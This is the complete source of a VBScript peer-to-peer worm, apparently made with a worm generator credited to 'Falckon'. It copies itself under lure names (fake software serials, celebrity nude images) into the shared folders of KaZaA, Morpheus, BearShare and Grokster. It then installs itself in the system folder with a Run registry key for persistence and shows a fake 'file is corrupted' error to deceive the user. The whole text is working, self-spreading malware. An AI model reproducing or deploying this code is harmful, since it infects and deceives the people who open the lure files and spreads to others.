'Worm.P2P.HellPWG Generated by Falckon
'With Hell P2P Worm Generator v1.0 
On Error Resume Next
Dim HellPWG
Dim JPABNfso,JPABNws,JPABNfiles
Dim JPABNkaz
Dim JPABNmor
Dim JPABNbear
Dim JPABNprfi
Dim JPABNwrm
Dim JPABNwin
Dim JPABNgrok
Set JPABNfso = CreateObject("Scripting.fileSystemobject")
Set JPABNws = CreateObject("Wscript.Shell")
Set JPABNwin = JPABNfso.GetSpecialFolder(1)
JPABNfiles = Array("Visual Basic 6 Serial","Delphi 7 Serial","Delphi Enterprise Edition","FireWorks 4","Virtual Girl Lorena","Virtual Girl","Sex.jpg","KylieMinogue_nude_sex","ShakiraNaked.jpg","ShakiraAllBody.jpg")
JPABNwrm = Wscript.ScriptFullName
JPABNprfi = JPABNws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
JPABNkaz = JPABNprfi & "\KaZaA\My Shared Folder\"
If JPABNfso.FolderExists(JPABNkaz) = True Then
For JPABNcop = 0 To 9
JPABNfso.copyfile JPABNwrm,JPABNkaz &JPABNfiles(JPABNcop) & ".vbs"
Next
End If
JPABNmor = JPABNprfi & "\Morpheus\My Shared Folder\"
If JPABNfso.FolderExists(JPABNmor) = True Then
For JPABNs = 0 To 9
JPABNfso.copyfile JPABNwrm,JPABNmor &JPABNfiles(JPABNs) & ".vbs"
Next
End If
JPABNbear = JPABNprfi & "\bearshare\shared\"
If JPABNfso.FolderExists(JPABNbear) = True Then
For JPABNz = 0 To 9
JPABNfso.copyfile JPABNwrm, JPABNbear & JPABNfiles(JPABNz) & ".vbs"
Next
End If
JPABNgrok = JPABNprfi & "\Grokster\My Grokster\"
If JPABNfso.FolderExists(JPABNgrok) = True Then
For JPABNa = 0 To 9
JPABNfso.copyfile JPABNwrm,JPABNgrok & JPABNfiles(JPABNa) & ".vbs"
Next
End If
JPABNfso.copyfile JPABNwrm, JPABNwin & "\" & Wscript.ScriptName
JPABNws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\HellPWG", JPABNwin & "\" & Wscript.ScriptName
MsgBox "The file is corrupted",0,"Error"
Set JPABNws = Nothing
Set JPABNfso = Nothing
'Made in with Hell P2P Worm Generator v1.8 by Falckon/ViriiZOne
'http://www.viriizone.tk
